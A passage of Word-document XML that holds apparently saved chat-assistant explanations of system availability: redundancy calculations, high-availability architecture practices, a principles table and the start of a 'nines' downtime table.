        <w:t>Two databases in active-passive, each 99.9%:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E94C3E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1EC2C3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>= 1 - (0.001 × 0.001) = 1 - 0.000001 = 0.999999 (99.9999%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56227D51" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Combined (realistic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E7B66" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>2 Load Balancers (parallel, each 99.9%) → 3 App Servers (parallel, each 99.9%) → 2 Databases (parallel, each 99.9%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640ABE9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0FB16E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>LB Availability = 1 - (0.001)^2 = 0.999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716B41C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>App Availability = 1 - (0.001)^3 = 0.999999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D08666B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>DB Availability = 1 - (0.001)^2 = 0.999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E0550" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="0A2EC43A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Total = 0.999999 × 0.999999999 × 0.999999 ≈ 0.999998 (five 9s+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2AA9B4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The catch:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> This assumes failures are independent. In reality, correlated failures (shared network, same software bug, same config push) dramatically reduce actual availability below theoretical calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BD46EA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="4338912B">
          <v:rect id="_x0000_i1703" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="125667C3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Real-World Availability Architecture — Putting It All Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D754C5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How a system like Gmail achieves 99.99%+ availability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBD47F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> via anycast and GeoDNS routes users to the nearest healthy region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73D831" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple regions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> each capable of handling full load (active-active for reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D399149" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Within each region:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Multiple AZs, multiple replicas of every service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04879449" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data replicated</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> synchronously within a region (Spanner-style, using TrueTime for global consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6050642C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asynchronous cross-region replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> for disaster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071FD9E8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breakers</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> between every service pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF75EAA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load shedding</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> when any component is overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7813E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Canary deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> with automatic rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125E724" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error budgets</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> controlling deployment velocity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16210BB9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (intentionally injecting failures) to validate resilience assumptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB822A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="6C26087E">
          <v:rect id="_x0000_i1704" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D4372" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary of Key Takeaways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43"/>
        <w:gridCol w:w="4158"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="6499E42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21637B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Principle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F20AEC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="085A803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D1FBD6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Eliminate SPOF</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B73AE0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Redundancy at every layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="7E062DC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F5737B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Assume failure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5C03AE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Design for it, don't prevent it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="1F39D8A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17505C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Fail fast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72B941" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Timeouts, circuit breakers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="03C8BEB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39DAE3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Degrade gracefully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8EE3E0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Serve partial results over no results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="45DD1E9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48A6F4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Isolate failures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39B4E2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Bulkheads, separate pools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="3865066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EA59B2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Automate recovery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7FE446" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Health checks, auto-scaling, failover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="0929D83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B3875F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Measure availability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5CF4D9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>SLIs/SLOs, error budgets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="4DFB912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577B7D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Test resilience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29284B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Chaos engineering, game days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46FDA8A7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The core insight: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability is not a feature you add — it's an architectural property that emerges from deliberate design decisions at every layer of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3500D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2B860" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # Availability — Deep Technical Breakdown --- ## What</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157F072" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B040C0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="48A473D3">
          <v:rect id="_x0000_i2145" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B0B87A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Availability Actually Means (Beyond the Percentage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1F908" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability is defined as the fraction of time a system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operational and serving requests correctly</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBAA82" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552907C7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability = Uptime / (Uptime + Downtime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C533B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>But this definition is dangerously shallow. A system that responds to every request with an </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> is technically "up" but functionally unavailable. A system that responds correctly to 50% of requests and times out the other 50% has what availability? The real definition must include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1D487" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correctness:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The system returns valid responses, not garbage or errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48330D91" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeliness:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The system responds within an acceptable time window. A response after 30 seconds is functionally equivalent to no response for most applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C5B4D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Completeness:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> All parts of the system that a request depends on are functioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E677AD5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This is why the industry has moved toward </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLOs (Service Level Objectives)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — measuring availability not just as "is the server running" but as "what percentage of requests succeed within Xms." That is a far more honest and meaningful measure of availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFF965" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="67FC47CE">
          <v:rect id="_x0000_i2146" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F847C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Nines — What They Actually Mean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A7F5C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The famous "nines" table, but with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real operational implications</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1801"/>
        <w:gridCol w:w="1732"/>
        <w:gridCol w:w="1763"/>
        <w:gridCol w:w="1739"/>
        <w:gridCol w:w="2315"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="63019E0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34BF12" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Availability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92D66D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Annual Downtime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38F8FB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Monthly Downtime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B45F72" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
